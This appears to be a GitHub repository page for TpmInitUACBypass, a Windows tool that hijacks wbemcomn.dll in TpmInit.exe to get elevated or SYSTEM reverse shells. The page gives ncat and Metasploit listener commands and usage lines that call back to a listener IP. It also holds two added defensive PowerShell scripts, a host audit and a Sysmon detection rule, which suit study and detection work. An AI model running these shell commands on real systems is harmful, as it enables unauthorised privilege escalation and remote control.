  • Stars: 125
  • Rank: 286,335 (Top 6 %)
  • Language: C++
  • Created about 8 years ago
  • Updated about 8 years ago


Repository Details

Bypassing User Account Control (UAC) using TpmInit.exe
   ______                ____      _ __
  /_  __/___  ____ ___  /  _/___  (_) /_
   / / / __ \/ __ `__ \ / // __ \/ / __/
  / / / /_/ / / / / / // // / / / / /_
 /_/ / .___/_/ /_/ /_/___/_/ /_/_/\__/
    /_/
               UAC Suicide Squad v1.1
                      By Cn33liz 2016

A tool to bypass User Account Control (UAC) and obtain a High Integrity (or SYSTEM) reverse command shell, reverse PowerShell session, or reverse Meterpreter session. When TpmInit.exe starts, it first tries to load wbemcomn.dll from C:\Windows\System32\wbem. The DLL is not found there, so the loader tries again in C:\Windows\System32. This tool exploits that DLL search-order weakness in TpmInit.exe, which is auto-elevated by default, by supplying its own wbemcomn.dll. The same issue applies to the WMI Performance Adapter service (wmiApSrv), which runs with SYSTEM privileges. So besides using TpmInit.exe to obtain elevated privileges, we can also use it to start the wmiApSrv service and get a SYSTEM shell from our custom DLL :) As with any UAC bypass, the account running the tool must already be a member of the local Administrators group: the technique turns a medium-integrity administrator token into a high-integrity one and does nothing for a standard user.
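
The following PowerShell audit is an added example and is not code from the TpmInitUACBypass project. It checks a host for the three conditions the paragraph above relies on: that TpmInit.exe carries an autoElevate manifest, which wbemcomn.dll copies exist along the two locations named above and who signed them, and that the wmiApSrv service runs as LocalSystem; it also reads the UAC policy, since "Always notify" (ConsentPromptBehaviorAdmin = 2) prompts for auto-elevating binaries as well. It assumes Windows PowerShell 5.1 or later running from an elevated prompt and the default %SystemRoot% layout; the function names are my own.

```powershell
# Added example, not part of the TpmInitUACBypass project.
# Assumptions: Windows PowerShell 5.1+, elevated prompt, default %SystemRoot% layout.

function Test-AutoElevateManifest {
    param([Parameter(Mandatory)][string]$Path)
    # The embedded manifest is plain XML inside the PE resource section, so a raw
    # byte-string search is enough to tell whether autoElevate is set to true.
    $bytes = [IO.File]::ReadAllBytes($Path)
    $text  = [Text.Encoding]::ASCII.GetString($bytes)
    return ($text -match '<autoElevate>\s*true\s*</autoElevate>')
}

function Get-WbemcomnCopies {
    # Enumerate wbemcomn.dll in both locations the README describes (wbem first,
    # then System32) and report signer details for each copy that exists. A copy
    # directly in System32 that is NotSigned or not Microsoft-signed is the planted DLL.
    $candidates = @(
        (Join-Path $env:SystemRoot 'System32\wbem\wbemcomn.dll'),
        (Join-Path $env:SystemRoot 'System32\wbemcomn.dll')
    )
    foreach ($p in $candidates) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $item = Get-Item -LiteralPath $p
        $sig  = Get-AuthenticodeSignature -FilePath $p
        $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<none>' }
        [pscustomobject]@{
            Path    = $p
            Status  = $sig.Status
            Signer  = $signer
            Size    = $item.Length
            Written = $item.LastWriteTime
        }
    }
}

function Get-UacPolicy {
    # EnableLUA = 0 turns UAC off entirely. ConsentPromptBehaviorAdmin = 2 is
    # "Always notify", which prompts even for auto-elevating Windows binaries;
    # 5 is the default level at which TpmInit.exe elevates silently.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $v = Get-ItemProperty -Path $key
    [pscustomobject]@{
        EnableLUA                  = $v.EnableLUA
        ConsentPromptBehaviorAdmin = $v.ConsentPromptBehaviorAdmin
        AlwaysNotify               = ($v.ConsentPromptBehaviorAdmin -eq 2)
        DefaultLevel               = ($v.ConsentPromptBehaviorAdmin -eq 5)
    }
}

$tpminit = Join-Path $env:SystemRoot 'System32\TpmInit.exe'
if (Test-Path -LiteralPath $tpminit) {
    "TpmInit.exe autoElevate manifest: $(Test-AutoElevateManifest -Path $tpminit)"
} else {
    "TpmInit.exe not present at $tpminit"
}

"wbemcomn.dll copies on the search path:"
Get-WbemcomnCopies | Format-Table -AutoSize

# The README notes wmiApSrv runs as SYSTEM and loads the same DLL; confirm the account and binary path.
Get-CimInstance -ClassName Win32_Service -Filter "Name='wmiApSrv'" |
    Select-Object Name, State, StartMode, StartName, PathName | Format-List

Get-UacPolicy | Format-List
```

Run it before and after testing the tool: the "after" run should show a second wbemcomn.dll directly under System32 whose Status is not Valid or whose Signer is not Microsoft, which is the artifact to clean up. Note that Get-AuthenticodeSignature reports Microsoft system DLLs via their catalog signature on Windows 8 and later; on older releases the legitimate copy may also show as NotSigned, so compare paths and signers rather than relying on Status alone.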

Works on:

This version has been successfully tested on Windows 8.1 x64 and Windows 10 x64 (version 1511).

Compile:

This project is written in C/C++ using Windows API calls, so you need Visual Studio to compile it.
The source code of the required DLLs is included in the project, but it is not needed to run the tool:
the DLLs are embedded in the main executable as Base64-encoded, compressed binaries.

How to use it:

* [>] Usage: First set up a remote Netcat, Ncat or Meterpreter (x64) listener
* [>] Example: KickAss@PenTestBox:~$ sudo ncat -lvp 443

* [>] Or for msf: KickAss@PenTestBox:~$ sudo msfconsole
* [>] msf > use exploit/multi/handler
* [>] msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
* [>] msf exploit(handler) > set LHOST 10.0.0.1
* [>] msf exploit(handler) > set LPORT 443
* [>] msf exploit(handler) > exploit -j

* [>] Then on your target: TpmInitUACBypass.exe <Remote Listener IP> <Port> <powershell, cmd or msf> <system>

* [>] Example1: Remote Elevated Cmd Shell:   TpmInitUACBypass.exe 10.0.0.1 443 cmd
* [>] Example2: Remote SYSTEM Cmd Shell:     TpmInitUACBypass.exe 10.0.0.1 443 cmd system
* [>] Example3: Remote Elevated PowerShell:  TpmInitUACBypass.exe 10.0.0.1 443 powershell
* [>] Example4: Remote SYSTEM PowerShell:    TpmInitUACBypass.exe 10.0.0.1 443 powershell system
* [>] Example5: Remote Elevated Meterpreter: TpmInitUACBypass.exe 10.0.0.1 443 msf
* [>] Example6: Remote SYSTEM Meterpreter:   TpmInitUACBypass.exe 10.0.0.1 443 msf system
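
On the defender's side, the sequence above leaves two reliable traces: a wbemcomn.dll written directly into C:\Windows\System32, and TpmInit.exe (or the wmiApSrv service binary, when the `system` option is used) mapping that file. The function below is an added example, not code from the project, that applies those two rules to Sysmon-style ImageLoad (event 7) and FileCreate (event 11) records. It assumes Sysmon's field names (Image, ImageLoaded, TargetFilename, Signed) and that the wmiApSrv binary is WmiApSrv.exe; the `$events` array is constructed sample data, not a capture.

```powershell
# Added example, not part of the TpmInitUACBypass project.
# Assumptions: Sysmon field names; wmiApSrv's binary is WmiApSrv.exe.

$plantedDll = 'C:\Windows\System32\wbemcomn.dll'           # second search location from the README
$hostProcs  = @('TpmInit.exe', 'WmiApSrv.exe')             # auto-elevated host, SYSTEM service (assumed name)

function Find-WbemcomnHijack {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $image = Split-Path -Leaf $e.Image
        switch ($e.EventId) {
            11 {
                # Rule 1: any process dropping wbemcomn.dll directly into System32.
                if ($e.TargetFilename -ieq $plantedDll) {
                    [pscustomobject]@{
                        Time   = $e.Time
                        Rule   = 'FileCreate wbemcomn.dll in System32'
                        Image  = $e.Image
                        Detail = $e.TargetFilename
                    }
                }
            }
            7 {
                # Rule 2: TpmInit.exe or the wmiApSrv binary mapping the System32 copy.
                # The Signed field is reported for triage; a legitimate Windows DLL would be signed.
                if (($hostProcs -icontains $image) -and ($e.ImageLoaded -ieq $plantedDll)) {
                    [pscustomobject]@{
                        Time   = $e.Time
                        Rule   = "ImageLoad of planted DLL by $image (Signed=$($e.Signed))"
                        Image  = $e.Image
                        Detail = $e.ImageLoaded
                    }
                }
            }
        }
    }
}

# Constructed sample records (not captured data): a drop, two suspicious loads, one benign load.
$events = @(
    [pscustomobject]@{ Time='2016-04-01T10:00:01'; EventId=11; Image='C:\Users\bob\Desktop\TpmInitUACBypass.exe'; TargetFilename='C:\Windows\System32\wbemcomn.dll' }
    [pscustomobject]@{ Time='2016-04-01T10:00:02'; EventId=7;  Image='C:\Windows\System32\TpmInit.exe';            ImageLoaded='C:\Windows\System32\wbemcomn.dll';      Signed='false' }
    [pscustomobject]@{ Time='2016-04-01T10:00:03'; EventId=7;  Image='C:\Windows\System32\wbem\WmiApSrv.exe';      ImageLoaded='C:\Windows\System32\wbemcomn.dll';      Signed='false' }
    [pscustomobject]@{ Time='2016-04-01T10:00:04'; EventId=7;  Image='C:\Windows\System32\svchost.exe';            ImageLoaded='C:\Windows\System32\wbem\wbemcomn.dll'; Signed='true'  }
)

Find-WbemcomnHijack -Events $events | Format-Table -AutoSize
```

With the sample input the first three records are flagged and the fourth (a load from the wbem directory) is not. Against real data, feed it the output of `Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational'` after projecting the XML fields into the same property names; the rules key on the DLL path and the loading process, not on the process that wrote the file, so they hold regardless of which copy mechanism placed it.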

Strong Advice

  • Do not use accounts with Administrative privileges for daily computer usage!

More Repositories

  • p0wnedShell (C#, 1,519 stars): PowerShell Runspace Post Exploitation Toolkit
  • StarFighters (Visual Basic, 319 stars): A JavaScript and VBScript Based Empire Launcher, which runs within their own embedded PowerShell Host.
  • MSBuildShell (283 stars): MSBuildShell, a Powershell Host running within MSBuild.exe
  • CScriptShell (C#, 158 stars): CScriptShell, a Powershell Host running within cscript.exe
  • JSMeter (JavaScript, 136 stars): JavaScript Reversed TCP Meterpreter Stager
  • VBSMeter (Visual Basic, 87 stars): VBS Reversed TCP Meterpreter Stager
  • SmashedPotato (C#, 83 stars)
  • p0wnedLoader (C#, 72 stars)
  • p0shKiller (C++, 62 stars)
  • HSEVD-StackOverflowX64 (C, 62 stars): HackSys Extreme Vulnerable Driver - Windows 10 x64 StackOverflow Exploit with SMEP Bypass
  • MacroMeter (Visual Basic, 62 stars): VBA Reversed TCP Meterpreter Stager
  • MS17-012 (59 stars): MS17-012 - COM Session Moniker EoP Exploit running within MSBuild.exe
  • SharpCat (C#, 46 stars): SharpCat - A Simple Reversed Command Shell which can be started using InstallUtil (Bypassing AppLocker)
  • EasySystem (C, 43 stars): Quick and dirty System (Power)Shell using NamedPipe impersonation.
  • TpmInitUACAnniversaryBypass (C++, 42 stars): Bypassing User Account Control (UAC) using TpmInit.exe
  • HSEVD-ArbitraryOverwriteGDI (C, 40 stars): HackSys Extreme Vulnerable Driver - ArbitraryOverwrite Exploit using GDI
  • HSEVD-StackOverflow (C, 30 stars): HackSys Extreme Vulnerable Driver - StackOverflow Exploit
  • p0wnedReverse (C#, 27 stars): PowerShell Runspace Connect-Back Shell
  • HSEVD-ArbitraryOverwrite (C, 25 stars): HackSys Extreme Vulnerable Driver - ArbitraryOverwrite Exploit
  • HSEVD-VariousExploits (C, 21 stars): HackSys Extreme Vulnerable Driver - Various Windows 7 x86 Kernel Exploits
  • HSEVD-StackCookieBypass (C, 19 stars): HackSys Extreme Vulnerable Driver - StackOverflow with Stack Cookie Bypass Exploit
  • HSEVD-StackOverflowGDI (C, 18 stars): HackSys Extreme Vulnerable Driver - Windows 10 x64 StackOverflow Exploit using GDI
  • HackTheBox-Jail (Python, 15 stars): HTB Jail Remote Exploit By Cneeliz - 2017
  • HSEVD-ArbitraryOverwriteLowIL (C, 14 stars): HackSys Extreme Vulnerable Driver - ArbitraryOverwrite Exploit using GDI -> Low Integrity to System
  • HackTheBox-Smasher (Python, 8 stars)
  • FortiParse (Python, 4 stars): Fortigate Configuration Parser